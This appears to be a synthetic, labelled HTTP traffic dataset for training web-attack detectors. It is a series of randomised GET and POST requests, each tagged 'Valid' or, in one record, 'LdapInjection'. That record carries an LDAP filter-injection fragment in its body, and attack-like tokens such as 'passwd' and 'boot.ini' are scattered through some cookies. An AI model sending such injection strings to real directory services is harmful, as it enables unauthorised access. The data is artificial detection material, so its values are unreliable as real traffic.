If-Modified-Since: Tue, 16 Dec 08 16:34:10 UTC
If-Unmodified-Since: Fri, 07 Aug 09 10:05:45 CET
If-Match: *
If-None-Match: *
If-Range: "ikSCpF6W1BXqjEZBtoI7"
Max-Forwards: 98
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: Basic bm1KNWU6ZWg5bWg=
Range: 628095-,47-562,-3325
Referer: http://efditslS.biz/t6eo/ztoten/rreme/eassle/p6hd.htm
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: ozStldi (eOMasOY; rfhO0wsDh)
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.6 58.50.49.95
Transfer-Encoding: Ncqi
Upgrade: wit/8.9
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 183.59.161.0
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24671
Start - Id: 20510
class: Valid
GET /ersysi5v8Wse1e/flnaxCDCzFIr/rvL9SWvUqOexRL.png?NseqrhRmc=O%2F%26&xhhleRdew=pafuubeh&shemsrtNi=txioRskanleeAr&eroobosef0=+Ai+&serHu=9456&ice43EnElh=4&6feeerci9o=745093&aue=s%277rcp&ba3uaswOvt=oqgl%40iFH&dxsL=ou+ta HTTP/1.0
Host: 169.211.25.138:73
Connection: etrY
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: k-im1;q=0.9, oevww-ftAtne;q=0.2, tbd-0tighohd, miee1o-eattnev;q=0.7
Cache-Control: max-age=23
Client-ip: 84.84.100.25
Cookie: Ailelo5aeeb=x;hzeaO5=505777;msy=rz59PHhentgjwR;swsRan1=322644;dfetVrEs9oao=trr;ea=p9eIsttaZVaa
Cookie2: $Version="20"
Date: Mon, 09 Feb 09 10:54:08 CET
ETag: W/"5NGpx4Cv7.7g6K@W2lq"
Expect: 100-continue
From: ttui@snpa.it
If-Modified-Since: Fri, 17 Feb 06 05:14:23 UTC
If-Unmodified-Since: Tue, 24 Mar 09 20:07:50 GMT
If-Match: "--ngB44z_ya@HDZfBng"
If-None-Match: "hxXm-0JNoxhAUt7"
If-Range: "AKuWP9KlwYj..yhN"
Max-Forwards: 98
MIME-Version: 6.1
Pragma: tT='su'
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Basic MU1VTzp0VGVscEFh
Range: 4491-065001,286085-641,-713
Referer: http://www.i3drh.gov/eGohek/rOiswinB/rtl0as.jpeg
TE: gzip;q=0.2
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 0.8; DU-oW; rv:1.4.8) Gecko/76228251
UA-CPU: MIPS
UA-Disp: 027,9138,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1448x0592
Via: 2.2 141.191.108.67, HTTP/5.5 78.97.184.223
Transfer-Encoding: identity
Upgrade: mip/6.3, ae5U3a/1.9, EalE/9.6, prd/9.3
Warning: 358 31.230.86.11 "lxeoteiukr" "Sun, 20 Feb 05 06:39:18 GMT"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 48113953855
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20510
Start - Id: 14113
class: Valid
GET /urvnls2aiEir/3styley/jZAa@_z1fOm8z/hsysim/tO3ifar/bonirwesoneloriodne.exe?essmenho=6&ovtt=cro2sx&ekox=oietOaf HTTP/1.0
Host: 192.108.110.162
Connection: tebi
Accept: audio/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: s-46tsew5s;q=0.4
Cache-Control: only-if-cached
Client-ip: 64.51.59.254
Cookie: ll=aelwtjyji;csthdoaToAou4d=wcir;t3ubNf6v@=t7Tesen650;eoadoiwzI8=29;cosoy77ttrdlEt=1xr;8Em=timsi
Cookie2: $Version="27"
Date: Wed, 14 Jul 04 15:07:55 GMT
ETag: W/"CEIqg29.6WwZ2I9"
Expect: sK3n=wyein
From: gqfl6@xdoSp.uk
If-Modified-Since: Sat, 25 Oct 08 14:45:18 UTC
If-Unmodified-Since: Tue, 07 Jul 09 18:17:48 UTC
If-Match: "bUKWX@us4RFtSc4q"
If-None-Match: "xM6t0JbjDHMaA8v."
If-Range: Tue, 12 Oct 04 20:27:23 CET
Max-Forwards: 228
MIME-Version: 5.8
Pragma: oh=e8lurh
Proxy-Authorization: NTLM Y0FhbmpyZXN5ZWFuYWxzZWV0bmtsNHJlc29hd3J0OW5lcnJlZ2Q1aG9sbmw4dGE=
Authorization: NTLM bWVzdTdsb2cwaW91OHVkb2R0bXJhaGVhYXRzSHQwaGh1dFRxdHM2bXNkdXN6cg==
Range: -445,968337-8
Referer: http://iaId.st/trar/etAhaia3/huoi58b/oHseayo/mini.cfm
TE: trailers,trailers,deflate
Trailer: If-None-Match
User-Agent: aCtonnn (sVgYBwMrx9; 5qavW2qLt)
UA-CPU: x86
UA-Disp: 8924,5533,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 454x057
Via: HTTP/9.7 251.75.150.82, 3.6 www.enemx.tiff, 1.2 179.97.179.155
Transfer-Encoding: n7li
Upgrade: yrp0/0.5, e40es/7.1
Warning: 086 www.tdkos.css "uisvnesrhn5pye" "Mon, 27 Dec 04 14:53:29 UTC"
X-Forwarded-For: 192.192.53.173
X-Serial-Number: 6453522338858945
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14113
Start - Id: 29159
class: Valid
GET /lDaa34/o1V7/a7f_qgdEBX2Vv4lhRj/x.gsu946AE/O70servicesI8VKzlocationamhtpass/qH-poY7ZF3NlgH8QWl8f/dmsaoilriSqqe/te/ainlecI0fIwrlialut/mhK8GO/ez/gDW9.gif?sbbRtfl=eRRdt2nm&apt9ien=10991&uooctsd=2856&M7KRlogFSFAtscript=s&eehe=link%2B&nrOHB-c=cENTCafHkj HTTP/1.0
Host: www.Rhtesaar7h.ch:02207
Connection: lEtee
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Ab-hdfhNw;q=0.4, enl-aen, 13a-bltGmbsp, ujrn-cnh9n, Ecoslii-aSpo;q=0.1
Cache-Control: tdIo2rI=cybdN
Client-ip: 182.121.83.72
Cookie: fYscAsss=hiioo;sttaFbTenut=rYSO;sGuRNbzanltit=9429;npiamanzcea=82089;8Crfe7doEheosto=Hmetan0o
Cookie2: $Version="4"
Date: Sun, 04 Oct 09 03:16:48 UTC
ETag: "7rsEknd1N@inEVcX"
Expect: zNanLe=feir
From: eiiaeuA@e0hi.it
If-Modified-Since: Sun, 10 Apr 05 15:37:09 CET
If-Unmodified-Since: Tue, 31 Jan 06 02:28:58 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Oct 09 24:26:12 UTC
Max-Forwards: 4
MIME-Version: 6.1
Pragma: 5ee='cRsc'
Proxy-Authorization: r6cRja o1ns=aoel
Authorization: NTLM MmxXZWNyb3Rjb2F0emVlemVhdGlpb2JlbWF0b2RUaHBOc3Jya25ydA==
Range: 21-228505,111-,03195-
Referer: http://diuelm.ch/arhtnsdt/irfrt.gif
TE: deflate;q=0.8,deflate
Trailer: Date
User-Agent: c2dR (gbviS@oXSb; nr5Yo8J)
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0871x656
Via: 0.7 www.wRxhIAt.png:3, 0.1 235.251.190.167, 2.4 194.255.77.220
Transfer-Encoding: gzip
Upgrade: 8yqoe/8.0, a0aFi/4.0
Warning: 708 56.218.81.142:38202 "p3Rsenoiem43hyao" "Sat, 16 Jun 07 21:36:47 GMT"
X-Forwarded-For: 97.58.176.102
X-Serial-Number: 59543
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29159
Start - Id: 15944
class: Valid
GET /xPdivpxwq/so8ZlTtPMIySeKMFv/aY5b4M/e@2fPtbxZ4/iti4noO0m.dll?qmgiua=nnaio+bseeC%3A HTTP/1.1
Host: 163.69.131.245:74357
Connection: close
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: a-cx;q=0.5
Cache-Control: min-fresh=13
Client-ip: 240.237.65.163
Cookie: ayUtgrz=S NhUuhsbeho
Cookie2: $Version="4"
Date: Tue, 12 May 09 15:11:57 GMT
ETag: "DI0zyGuTKgWl-.i"
Expect: 100-continue
From: foupIigo@8aw9mD.net
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Mon, 13 Feb 06 15:48:13 UTC
If-Match: "l-zaIa0SPE6BKyea3zMO"
If-None-Match: "7C@ec@HYEmG8a5T"
If-Range: "SSGdwgIXkJfY8u3wgKr3"
Max-Forwards: 017
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: NTLM Z2hJbW9uYW91bm5IbHBkZmlibmNvaW9tYXNFeWFleG80cg==
Range: 638-
Referer: /5hesc/a3pe/lhrD/mcbpPfas.htm
TE: trailers
Trailer: Accept-Charset
User-Agent: ino9eurh/5.8.6.4
UA-CPU: StrongARM
UA-Disp: 9788,9519,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7490x6757
Via: FTP/8.0 www.rDrce6r.css
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 85.163.36.22
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15944
Start - Id: 32051
class: Valid
GET /c-dq36Jml.-k2a/shBDZ9/z1cof0Z_YRJu/0gH96UiysVPM32/uMWku/ldsha/S1olhc0ry/TV9-XXT/aFF_KT6R2NuxblKfr2/oeM2ui832We@DBMI/tcrsZTadsauelmve.aspx?ihdnro=ekzuS9&EhatsAhoh=eNb&jeeeh9s=%3B1i6g+uiframeu+bei%24nuniontj&r9tdoaobtshenc=drmu%7C&NqQ8=1866464851&w7echolinkN=H%7EHgheeh&varKiMhAt6=4anasdo%2Fso0t&raturerr=535793&AvH@Tr=qoigddivastdinjhs&trteszoa=nane&ynon=6eeaonemdnmx+cl&imbtwlkittant=aQ9zX HTTP/1.1
Host: www.setZshi.gov
Connection: aftdeb
Accept: */*
Accept-Charset: windows-1255, macintosh;q=0.1, x-mac-arabic, iso-8859-9;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=19661
Client-ip: 162.82.152.35
Cookie: q2TU06havingMn=vusSr;.rKI4JK2pbody=eeooeB;Nq0e1ado=otVn-a7l%t;w.autoexecS6IycH=0j0nsneoi
Cookie2: $Version="7"
Date: Sat, 24 Nov 07 24:13:00 GMT
ETag: W/"h-9kpBabMMWH18w"
Expect: 100-continue
From: wNooie@yaieEicl.de
If-Modified-Since: Mon, 19 Jan 09 18:39:35 CET
If-Unmodified-Since: Sun, 09 Dec 07 18:24:47 UTC
If-Match: "gnHH1U.2mML2.Xar5"
If-None-Match: *
If-Range: Fri, 15 Jul 05 03:01:03 CET
Max-Forwards: 7
MIME-Version: 3.7
Pragma: oxfaa='iettia'
Proxy-Authorization: Basic aGx1ZTppbHJ0ZQ==
Authorization: aSLf0 ryrrt=snrzIdtr
Range: 81-,-8,-69673
Referer: http://www.ozbtetoe.ch/eeiesw/hini1z/resomeu/qpt0rlc.asp
TE: trailers
Trailer: If-Range
User-Agent: ssPVI.cfYq http://www.9dhe.fr
UA-CPU: x86
UA-Disp: 342,5429,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: deflate
Upgrade: Leh/7.4, odi/8.1
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 158.151.229.231
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32051
Start - Id: 16438
class: Valid
GET /toilpliiatoeoeg/eaoap/aK@/nNhe3eeffhrdanayUdi.nsf?zKZs9=%7Efrom&i6r2oOns=ntloCUemotaj&8ixMur=8+qfchwp-freug&hfwhdvxnh=2XoeksrzohVhar1ern&krmsaijTn4irei=txmlvee&D61ArKpositiondU8=7418309&in0uyo2kthudQoh=8&lnxfNaoewjtgs=eBBmSCc4Vw4&bpamrseiredz9m=rfI1eiaLe&qNQvxmlc_8ZD=882712717&n0crhd=01196 HTTP/1.0
Host: 0.137.78.226
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.4, gzip;q=0.5, identity;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 148.100.126.43
Cookie: lFphpimbuFLAy=bere7b2cs;aa=39;pzsamQ-S821bf=545117
Cookie2: $Version="01"
Date: Mon, 24 Sep 07 03:11:53 CET
ETag: "Cf3yg0dSKGToLbNJ1_2"
Expect: 100-continue
From: etez@jee7ryhWs.gov
If-Modified-Since: Thu, 23 Sep 04 14:46:51 GMT
If-Unmodified-Since: Wed, 06 May 09 04:15:36 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Jan 10 18:58:22 GMT
Max-Forwards: 950
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: tdhuf n4f6rb=aohauny
Authorization: Digest cnonce="seoeJcg"
Range: -4,1-
Referer: http://l1c4.com/in7eVA3n/otun5tg/bjW41dai.jsp
TE: chunked;q=0.0,trailers,gzip
Trailer: Date
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 2.2; sr-eh; rv:9.5.1) Gecko/08545227
UA-CPU: StrongARM
UA-Disp: 437,939,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4066x2541
Via: 4.5 www.st8ra.shtml, 1.2 65.109.92.7, 6.0 13.179.4.97
Transfer-Encoding: identity
Upgrade: zcoos/4.4, u1ik/1.2
Warning: 407 www.yCMon.gif "snhRTtstehedo" 
X-Forwarded-For: 242.120.138.182
X-Serial-Number: 3885571205
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16438
Start - Id: 23135
class: Valid
GET /bhOt6yG/l3NM2ufedmpcmtitrtor.swf?bNsDcwhere1=6636917&aaycrs5xtioTe=il&iOBp@=433507&trnmtt2=nRE3uwD&looi=28876791&y8nenclnssdoeet=qlhomeootaEos&na27=rACbpLy-&ihcemexrEEakf8=55211&sNmDu1Ckc9oY=5213975 HTTP/1.0
Host: www.eatieldi.ch:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-pwReed, gzCh0q-er2ls;q=0.4
Cache-Control: no-store
Client-ip: 114.241.46.240
Cookie: .vM6v0Lcmdkb3=vRlql@44Dsf;rt=eeLl
Cookie2: $Version="12"
Date: Wed, 05 Jul 06 12:21:22 UTC
ETag: "ln@-DQt5MAST7dr"
Expect: kseno7lE=dU2ds;5eOtlDeH
From: xtisieil@oihdn.cz
If-Modified-Since: Sat, 12 Feb 05 24:45:23 CET
If-Unmodified-Since: Mon, 02 Feb 09 06:02:11 GMT
If-Match: *
If-None-Match: ".Zu.pUgyZcAfi7SoU7p"
If-Range: Tue, 19 Oct 04 20:36:14 UTC
Max-Forwards: 3
MIME-Version: 0.1
Pragma: n=o3
Proxy-Authorization: Basic YXhpc25zbnA6dGFsZXBu
Authorization: NTLM ZW43b2p5OGRvZ0FpY2V0MWRhaWF2dXlraG5sY1hyaHVueWwxaGlyaGFmbQ==
Range: 326-34,0-03476
Referer: /sluo/hnltruw/ebed.php
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 1.8; lg-ee; rv:0.6.0) Gecko/53033822
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 558x894
Via: 7.4 www.meovosti.tiff, 3.3 193.22.20.164, 5.2 www.do3r.jpg
Transfer-Encoding: identity
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23135
Start - Id: 17168
class: Valid
GET /9x09H2L/rnrnsa2di/med/ntnWF9oHNk3vYeM8SrI/slisnodqoeio/emFconnectaH/JOXwinntVVCOVK/khp4gNcooH3tponoeM.asp?ut=209247&rOka=34519&5idourh=ramrYfzpoie HTTP/1.1
Host: www.tqnatsv.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: utf-7, isiri-3342;q=0.5, windows-874;q=0.4, euc-jp, euc-cn;q=0.8
Accept-Encoding: gzip;q=0.3, deflate;q=0.3, compress, identity
Accept-Language: li-0kayEfp;q=0.4
Cache-Control: min-fresh=6
Client-ip: 127.44.49.75
Cookie: Haccept60a=faccess_logwp-;Eb.dDaaa=82;gicsy8dnrt=6;stotw=etsrr
Cookie2: $Version="8"
Date: Mon, 12 Apr 04 04:39:12 UTC
ETag: W/"fC2iwVqebiOk3RGH"
Expect: vasej1at
From: efabt@teina.org
If-Modified-Since: Thu, 11 Aug 05 04:08:12 UTC
If-Unmodified-Since: Fri, 08 Feb 08 07:17:27 CET
If-Match: *
If-None-Match: "RXFzcE6Gun5a.ZVwJroJ"
If-Range: "a9tfhDyuuR5@WfblII"
Max-Forwards: 668
MIME-Version: 3.2
Pragma: f0ghbeEi='hic9eaee'
Proxy-Authorization: Basic RW9keVA6c29waXNoZWI=
Authorization: iis40p ltrk2=itoiems
Range: -785968,-02
Referer: http://tsmeesar.biz/eoeaa.rar
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: mirg7LpYis/9.0.7.4.8
UA-CPU: StrongARM
UA-Disp: 182,819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: FTP/8.7 www.hSrnZnri.jpeg:22
Transfer-Encoding: identity
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17168
Start - Id: 37638
class: LdapInjection
POST /9Rs9isnqzwweehtae/pabue/NG6position/zVMKO/iJLgY@rY0DJe_ci/omN6qxWjQdSVGBvlcS/q_j5onBS8_8union/mMSZK.msf? HTTP/1.1
Content-Length: 86
Content-Language: b
Content-Encoding: compress
Content-Location: /rdeawc/Ld4li/vSthmH/amrce/ksinm.doc
Content-MD5: OWNvbFBmYWFlb25kcmJNYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 13:53:15 GMT
Last-Modified: Fri, 05 Nov 04 01:09:13 GMT
Host: www.p9vhocdnt.gov
Connection: close
Accept: video/mpeg, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=43
Client-ip: 76.236.29.239
Cookie: J0noyNOP=intcataisock_streamefHd;tajiae0e=a336ehuw0i;hQLBShSWjfromV=ec8
Cookie2: $Version="477"
Date: Sat, 06 Oct 07 20:45:07 CET
ETag: "oj5Qe7MEf.fDr8DX"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Tue, 11 May 04 15:13:59 UTC
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: *
If-None-Match: "I._WofJ-xkYMZu_"
If-Range: "oyGgXVYLn2f.HERzf"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: /94xo3/s2sd7.php3
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/3.7 (compatible; Konqueror/8.2; Open BSD i586; stoinmke; wttcr)
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: gda/5.8 249.207.108.174, 2.6 152.126.196.113, rwscO/4.8 169.132.87.134
Transfer-Encoding: compress
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eiAaedEdE=oe(7hEs8h&Lsmieamet= tB&aethsewenUniwIs=)    (|   (vorho=icd*)

End - Id: 37638
Start - Id: 27407
class: Valid
GET /awl6r/gK5/iRr5r/ZCndivGinputm/hn/euhAeiubbiriiolee/YIa9/eCFvm/dHmcabLfyetIeHyysoe/hJy.dll? HTTP/1.1
Host: 228.178.67.9
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.0, iso-8859-7;q=0.0, isiri-3342;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 63.50.146.180
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="5"
Date: Tue, 07 Dec 04 08:13:59 GMT
ETag: W/"BHHr0EK50g2O3XR7hVTu"
Expect: 100-continue
From: glqntj@hA8egh.fr
If-Modified-Since: Thu, 21 Sep 06 06:17:37 GMT
If-Unmodified-Since: Sat, 19 Jan 08 23:18:17 GMT
If-Match: "hJrthLGKwYLIWEm"
If-None-Match: "6BAIrK3J1DTiZ7bAazEy"
If-Range: "tpdt.Hmhgi6LhGfGQ"
Max-Forwards: 9
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic ZmFpbXQ6ZXQxU3I=
Authorization: rwao thatc=Cptqz
Range: 824472-0908
Referer: /ntMoto/ectHu/geoPm/tfetem.png
TE: chunked;q=0.2,gzip,trailers
Trailer: Host
User-Agent: tjfhhilcs/1.8.5
UA-CPU: MIPS
UA-Disp: 009,2103,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9698x542
Via: 7.0 www.tftm.tiff, FTP/2.5 www.mLdestl3.htm, FTP/1.6 18.202.223.104
Transfer-Encoding: gzip
Upgrade: anhok/6.7, tgihE/5.8
Warning: 451 149.2.91.164 "tSo1" "Sun, 19 Jul 09 05:27:16 GMT"
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 012150343166763006
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27407
Start - Id: 30625
class: Valid
GET /hNByQ8RDh2s8kOeSX_/hPaYU_peq1cdH0.html?nheditNadi=dqOArxjRv&oauwtr5u=cfBvarbgsound6erhtpassse0ma9t&thace6dgw=osdao&c7c0oevMb=egCT%40&dcdusese=e39zio4le&jb8oQrgp=571 HTTP/1.1
Host: 142.5.100.177
Connection: close
Accept: text/*, application/rtf
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.2, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 149.22.165.96
Cookie: tu-3LrXpasswdWFiR=(a;jzd4ot=lErOe7eap;aeze=31;e5Her=87438893
Cookie2: $Version="85"
Date: Tue, 27 Nov 07 12:08:34 UTC
ETag: W/".QlNzoQJi9ABBdh"
Expect: sheseepe
From: rAjai@bdsfim.st
If-Modified-Since: Wed, 24 Dec 08 07:53:06 CET
If-Unmodified-Since: Tue, 17 Feb 04 17:09:30 CET
If-Match: *
If-None-Match: "twgyQWvlOicyVR@"
If-Range: "GTZH..j1P0WmYte"
Max-Forwards: 16
MIME-Version: 1.8
Pragma: nEN='rlmeis'
Proxy-Authorization: Basic dG9yZWNuaWk6ZUVEaWFySw==
Authorization: NTLM bmVlM29zb2ZoZWVuaElzc2FlbHRkZWVlYWh3Y290QXV0b3Q=
Range: 426-,-6
Referer: /tI6sedh/tdlsmaj/msoaea/vher6we.txt
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: 1Bihnh (8YX02RvB2q; lkJ9DC; j@dWMV; iH8Qr@)
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 015x009
Via: 8.6 84.18.147.82
Transfer-Encoding: identity
Upgrade: 0gtw/9.1, Wtkt/5.8, Hes6g/7.6, RE4ntd/6.1
Warning: 055 www.eenm1.shtml "niJnlgnspnleuaov" 
X-Forwarded-For: 115.201.164.251
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30625
Start - Id: 3859
class: Valid
POST /ijz@Sny/tkVwuj.pRGf@BbJ/mqWz9Qa6psr/2uNY9-Etz.js? HTTP/1.1
Content-Length: 42
Content-Language: awjtlte,yrlpes2
Content-Encoding: gzip
Content-Location: http://www.aiNu.com/njtvhl4/obGyp/0Dhht6Rc.asp
Content-MD5: aWUzZWVjdWV1aWpvc2lSZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Jun 09 22:06:42 CET
Last-Modified: Thu, 12 May 05 05:08:02 GMT
Host: www.dEiE.uk
Connection: Ichhy2
Accept: audio/basic, image/jpeg
Accept-Charset: iso-8859-5;q=0.1, x-mac-chinesetrad;q=0.0, koi8-r, utf-8, windows-1250
Accept-Encoding: compress;q=0.7, compress;q=0.9, compress;q=0.7, gzip;q=0.4, compress;q=0.4
Accept-Language: euebewce-tazsjU, ohto-h9
Cache-Control: gg7lvuhk=assf
Client-ip: 9.95.140.243
Cookie: teNRswixr=o]  dropcopy2Lr;xlj=o3;oyeiiv6i7oeeetc= 8ulogi;Mpdr=n acceptis4ntb-t;nhem=oWj0T;oxs4l=aeIdo
Cookie2: $Version="791"
Date: Wed, 01 Mar 06 01:13:16 CET
ETag: "iLM2WtRW3iK6QSZeemLw"
Expect: 100-continue
If-Modified-Since: Thu, 13 Sep 07 04:52:18 GMT
If-Unmodified-Since: Tue, 08 Apr 08 02:03:27 GMT
If-Match: *
If-None-Match: "GlY86XrXsk2OrEybCk"
If-Range: Mon, 22 Mar 04 05:25:57 UTC
Max-Forwards: 43
MIME-Version: 8.1
Pragma: no-cache
Authorization: hode 6etzt=neser81
Referer: /9uryteT/lm7te.nsf
TE: trailers,deflate;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 4.3; ne-ys; rv:5.0.8) Gecko/40276221
UA-OS: WinNT
Via: 2.2 161.20.200.4, 6.7 www.agce2s.html, 8.3 5.246.124.110
Transfer-Encoding: ntti
Warning: 263 www.lavqefa.html "nhe9cew0" 
X-Serial-Number: 4807054029601
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o0oSterdse=$s&jt3itsctsinteO=hioDRrianw5

End - Id: 3859
Start - Id: 21953
class: Valid
GET /C@Z3K/aED_t0zSTO3lkV/aid2p1en/dL-H/Jw9b5TP1t0U8/0IWxQNO@/8iwqXJ8aaqunDox/tnnlhsQlstlhaxenitst/.PaImQ8k7k/rcu/30dnazoirhdis/R_sxterm4K6KlsZ.dll?NvPv3sV2qU=tia7&hzeoTdkcic=t5s+&snotN=rtmhrrnH&T90y=31&9e0bntoye=dJ+ern%28u&HfNhvcsje1tt=1oz&ltrCofQl7=4636189&positionexecVXF@binV=dw4is&H5L03bC.=021&odo5emnh=aumsarsm&MrtnRohsrt=i%26o%3B%3D HTTP/1.1
Host: 220.24.184.0
Connection: close
Accept: audio/x-wav;q=0.0, video/quicktime;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.3, deflate;q=0.1, deflate, deflate
Accept-Language: *;q=0.2
Cache-Control: e5imss=samrtve6
Client-ip: 191.101.191.71
Cookie: mol=ovAftadsooTn;0yefuqwinof=objectt$bo;LIpxO2q9ZVS=a-Nb@LER;Ns0hLcssfaoovpo=h9WiiXnaofrrwm
Cookie2: $Version="04"
Date: Wed, 26 May 04 07:18:42 GMT
ETag: "h--L.A88i-u9EG1sS"
Expect: 100-continue
From: o5dwea@emautz6.org
If-Modified-Since: Fri, 30 Jul 04 15:35:06 GMT
If-Unmodified-Since: Mon, 28 Mar 05 13:52:31 GMT
If-Match: "cLaDUbs8Yk4@2vM8"
If-None-Match: *
If-Range: Thu, 01 Jan 09 08:41:39 UTC
Max-Forwards: 2711
MIME-Version: 7.1
Pragma: a=pmk
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Basic dHR2dW5lcG86YXNsd25m
Range: 81-3452
Referer: http://edknajl.de/jh0gm.nsf
TE: deflate
Trailer: Authorization
User-Agent: sgeoEeeerlgoOoEl
UA-CPU: x86
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 501x9134
Via: 5.5 www.ttsa.tiff, aHiAgO/9.8 74.217.9.245:49588, 5.1 www.nenceoeo.htm
Transfer-Encoding: identity
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
